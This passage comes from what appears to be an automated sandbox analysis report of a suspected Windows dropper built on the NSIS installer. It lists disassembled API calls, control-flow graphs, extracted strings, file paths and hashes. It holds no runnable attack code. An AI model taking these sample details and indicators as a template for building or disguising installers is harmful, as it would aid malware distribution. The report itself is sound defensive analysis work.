                                                                • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                              • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                              • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                              • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-2369375780
                                                              • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                              • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                              • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                              • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D

                                                              Control-flow Graph

                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402ED2
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\450707124374000811.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\450707124374000811.exe,C:\Users\user\Desktop\450707124374000811.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\450707124374000811.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 4283519449-2548887016
                                                              • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                              • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                              • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                              • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C

                                                              Control-flow Graph
                                                              control_flow_graph 507 4062a4-4062af 508 4062b1-4062c0 507->508 509 4062c2-4062d8 507->509 508->509 510 4064f0-4064f6 509->510 511 4062de-4062eb 509->511 512 4064fc-406507 510->512 513 4062fd-40630a 510->513 511->510 514 4062f1-4062f8 511->514 515 406512-406513 512->515 516 406509-40650d call 406282 512->516 513->512 517 406310-40631c 513->517 514->510 516->515 519 406322-406360 517->519 520 4064dd 517->520 523 406480-406484 519->523 524 406366-406371 519->524 521 4064eb-4064ee 520->521 522 4064df-4064e9 520->522 521->510 522->510 527 406486-40648c 523->527 528 4064b7-4064bb 523->528 525 406373-406378 524->525 526 40638a 524->526 525->526 529 40637a-40637d 525->529 532 406391-406398 526->532 530 40649c-4064a8 call 406282 527->530 531 40648e-40649a call 4061c9 527->531 533 4064ca-4064db lstrlenW 528->533 534 4064bd-4064c5 call 4062a4 528->534 529->526 535 40637f-406382 529->535 545 4064ad-4064b3 530->545 531->545 537 40639a-40639c 532->537 538 40639d-40639f 532->538 533->510 534->533 535->526 541 406384-406388 535->541 537->538 543 4063a1-4063bf call 406150 538->543 544 4063da-4063dd 538->544 541->532 553 4063c4-4063c8 543->553 548 4063ed-4063f0 544->548 549 4063df-4063eb GetSystemDirectoryW 544->549 545->533 547 4064b5 545->547 554 406478-40647e call 406516 547->554 551 4063f2-406400 GetWindowsDirectoryW 548->551 552 40645b-40645d 548->552 550 40645f-406463 549->550 550->554 559 406465 550->559 551->552 552->550 556 406402-40640c 552->556 557 406468-40646b 553->557 558 4063ce-4063d5 call 4062a4 553->558 554->533 561 406426-40643c SHGetSpecialFolderLocation 556->561 562 40640e-406411 556->562 557->554 564 40646d-406473 lstrcatW 557->564 558->550 559->557 566 406457 561->566 567 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 561->567 562->561 565 406413-40641a 562->565 564->554 569 406422-406424 565->569 566->552 567->550 567->566 569->550 569->561
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                              • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                              • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                              • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                              • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 717251189-1230650788
                                                              • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                              • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                              • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                              • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D

                                                              Control-flow Graph
                                                              control_flow_graph 634 40176f-401794 call 402c37 call 405bca 639 401796-40179c call 406282 634->639 640 40179e-4017b0 call 406282 call 405b53 lstrcatW 634->640 645 4017b5-4017b6 call 406516 639->645 640->645 649 4017bb-4017bf 645->649 650 4017c1-4017cb call 4065c5 649->650 651 4017f2-4017f5 649->651 658 4017dd-4017ef 650->658 659 4017cd-4017db CompareFileTime 650->659 653 4017f7-4017f8 call 405d4f 651->653 654 4017fd-401819 call 405d74 651->654 653->654 661 40181b-40181e 654->661 662 40188d-4018b6 call 4052e6 call 4030fa 654->662 658->651 659->658 664 401820-40185e call 406282 * 2 call 4062a4 call 406282 call 4058e4 661->664 665 40186f-401879 call 4052e6 661->665 676 4018b8-4018bc 662->676 677 4018be-4018ca SetFileTime 662->677 664->649 697 401864-401865 664->697 674 401882-401888 665->674 678 402ac8 674->678 676->677 680 4018d0-4018db CloseHandle 676->680 677->680 684 402aca-402ace 678->684 682 4018e1-4018e4 680->682 683 402abf-402ac2 680->683 686 4018e6-4018f7 call 4062a4 lstrcatW 682->686 687 4018f9-4018fc call 4062a4 682->687 683->678 693 401901-4022f6 call 4058e4 686->693 687->693 693->684 697->674 699 401867-401868 697->699 699->665
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017B0
                                                              • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,?,?,00000031), ref: 004017D5
                                                                • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,759223A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,759223A0), ref: 00405341
                                                                • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsj4634.tmp$C:\Users\user\AppData\Local\Temp\nsj4634.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call
                                                              • API String ID: 1941528284-3000692972
                                                              • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                              • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                              • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                              • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D

                                                              Control-flow Graph
                                                              control_flow_graph 700 4030fa-403111 701 403113 700->701 702 40311a-403123 700->702 701->702 703 403125 702->703 704 40312c-403131 702->704 703->704 705 403141-40314e call 403315 704->705 706 403133-40313c call 40332b 704->706 710 403303 705->710 711 403154-403158 705->711 706->705 712 403305-403306 710->712 713 4032ae-4032b0 711->713 714 40315e-4031a7 GetTickCount 711->714 717 40330e-403312 712->717 715 4032f0-4032f3 713->715 716 4032b2-4032b5 713->716 718 40330b 714->718 719 4031ad-4031b5 714->719 723 4032f5 715->723 724 4032f8-403301 call 403315 715->724 716->718 720 4032b7 716->720 718->717 721 4031b7 719->721 722 4031ba-4031c8 call 403315 719->722 726 4032ba-4032c0 720->726 721->722 722->710 734 4031ce-4031d7 722->734 723->724 724->710 732 403308 724->732 729 4032c2 726->729 730 4032c4-4032d2 call 403315 726->730 729->730 730->710 737 4032d4-4032e0 call 405e26 730->737 732->718 736 4031dd-4031fd call 4067bd 734->736 742 403203-403216 GetTickCount 736->742 743 4032a6-4032a8 736->743 744 4032e2-4032ec 737->744 745 4032aa-4032ac 737->745 746 403261-403263 742->746 747 403218-403220 742->747 743->712 744->726 750 4032ee 744->750 745->712 748 403265-403269 746->748 749 40329a-40329e 746->749 751 403222-403226 747->751 752 403228-40325e MulDiv wsprintfW call 4052e6 747->752 754 403280-40328b 748->754 755 40326b-403272 call 405e26 748->755 749->719 756 4032a4 749->756 750->718 751->746 751->752 752->746 759 40328e-403292 754->759 760 403277-403279 755->760 756->718 759->736 761 403298 759->761 760->745 762 40327b-40327e 760->762 761->718 762->759
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: ... %d%%$@
                                                              • API String ID: 551687249-3859443358
                                                              • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                              • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                              • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                              • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9

                                                              Control-flow Graph
                                                              control_flow_graph 763 402644-40265d call 402c15 766 402663-40266a 763->766 767 402abf-402ac2 763->767 768 40266c 766->768 769 40266f-402672 766->769 770 402ac8-402ace 767->770 768->769 771 4027d6-4027de 769->771 772 402678-402687 call 4061e2 769->772 771->767 772->771 776 40268d 772->776 777 402693-402697 776->777 778 40272c-40272f 777->778 779 40269d-4026b8 ReadFile 777->779 780 402731-402734 778->780 781 402747-402757 call 405df7 778->781 779->771 782 4026be-4026c3 779->782 780->781 783 402736-402741 call 405e55 780->783 781->771 791 402759 781->791 782->771 785 4026c9-4026d7 782->785 783->771 783->781 788 402792-40279e call 4061c9 785->788 789 4026dd-4026ef MultiByteToWideChar 785->789 788->770 789->791 792 4026f1-4026f4 789->792 795 40275c-40275f 791->795 796 4026f6-402701 792->796 795->788 797 402761-402766 795->797 796->795 798 402703-402728 SetFilePointer MultiByteToWideChar 796->798 799 4027a3-4027a7 797->799 800 402768-40276d 797->800 798->796 801 40272a 798->801 802 4027c4-4027d0 SetFilePointer 799->802 803 4027a9-4027ad 799->803 800->799 804 40276f-402782 800->804 801->791 802->771 805 4027b5-4027c2 803->805 806 4027af-4027b3 803->806 804->771 807 402784-40278a 804->807 805->771 806->802 806->805 807->777 808 402790 807->808 808->771
                                                              APIs
                                                              • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                              • String ID: 9
                                                              • API String ID: 163830602-2366072709
                                                              • Opcode ID: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                              • Instruction ID: 4c47c5b6e7001fd487639b42c981b506dedcea616f9f6d447a3608767ea6fa5a
                                                              • Opcode Fuzzy Hash: 0f6749e0356039c80119e9da3c7509a60750b74a106ccf27ce207c31930fcb0b
                                                              • Instruction Fuzzy Hash: 8351E575D1021AABDF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                              Control-flow Graph
                                                              control_flow_graph 809 4065ec-40660c GetSystemDirectoryW 810 406610-406612 809->810 811 40660e 809->811 812 406623-406625 810->812 813 406614-40661d 810->813 811->810 815 406626-406659 wsprintfW LoadLibraryExW 812->815 813->812 814 40661f-406621 813->814 814->815
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                              • wsprintfW.USER32 ref: 0040663E
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME$\
                                                              • API String ID: 2200240437-1946221925
                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                              • Instruction ID: 71749ee66451d02820e1787a81c679d49f65c12e6a5790e59d0bd58148e6f3af
                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                              • Instruction Fuzzy Hash: 64F021705001196BCF10AB64DD0DFAB3B5CA700304F10487AA546F11D1EBBDDA65CB98

                                                              Control-flow Graph
                                                              control_flow_graph 816 4057b5-405800 CreateDirectoryW 817 405802-405804 816->817 818 405806-405813 GetLastError 816->818 819 40582d-40582f 817->819 818->819 820 405815-405829 SetFileSecurityW 818->820 820->817 821 40582b GetLastError 820->821 821->819
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                              • GetLastError.KERNEL32 ref: 0040580C
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                              • GetLastError.KERNEL32 ref: 0040582B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2850643846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2850619179.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850674481.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850693548.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2850822528.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 3449924974-1246513382
                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                              • Instruction ID: 81d47e77b106c5c69b6f53bab6ade4ced08fad65239eb4e1eedbceb886e7a33c
                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                              • Instruction Fuzzy Hash: 8C01E5B2C00619DADF009FA1D9487EFBFB8EB14354F00803AD945B6281E7789618CFA9

                                                              Control-flow Graph
                                                              • Function 00405DA3-00405DF5, basic blocks 822-827, calling GetTickCount and GetTempFileNameW in a retry loop (graph image not reproduced; executed/not-executed marking not recoverable from text)
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405DC1
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\450707124374000811.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035BF), ref: 00405DDC
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-2934804179
                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                              • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                              • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64

                                                              Control-flow Graph
                                                              • Function 10001759-100018A8, basic blocks 828-882, calling GlobalFree and FreeLibrary and the subfunctions 10001B18, 10002286, 100022D0, 100024A4, 100015B4, 10001272, 10002B57, 1000289C, 10002640, 10002467 and 1000153D (graph image not reproduced; executed/not-executed marking not recoverable from text)
                                                              APIs
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                              • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                              • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2865137888.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2865038779.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865174166.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000000.00000002.2865214648.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                                              • String ID:
                                                              • API String ID: 1791698881-3916222277
                                                              • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                              • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
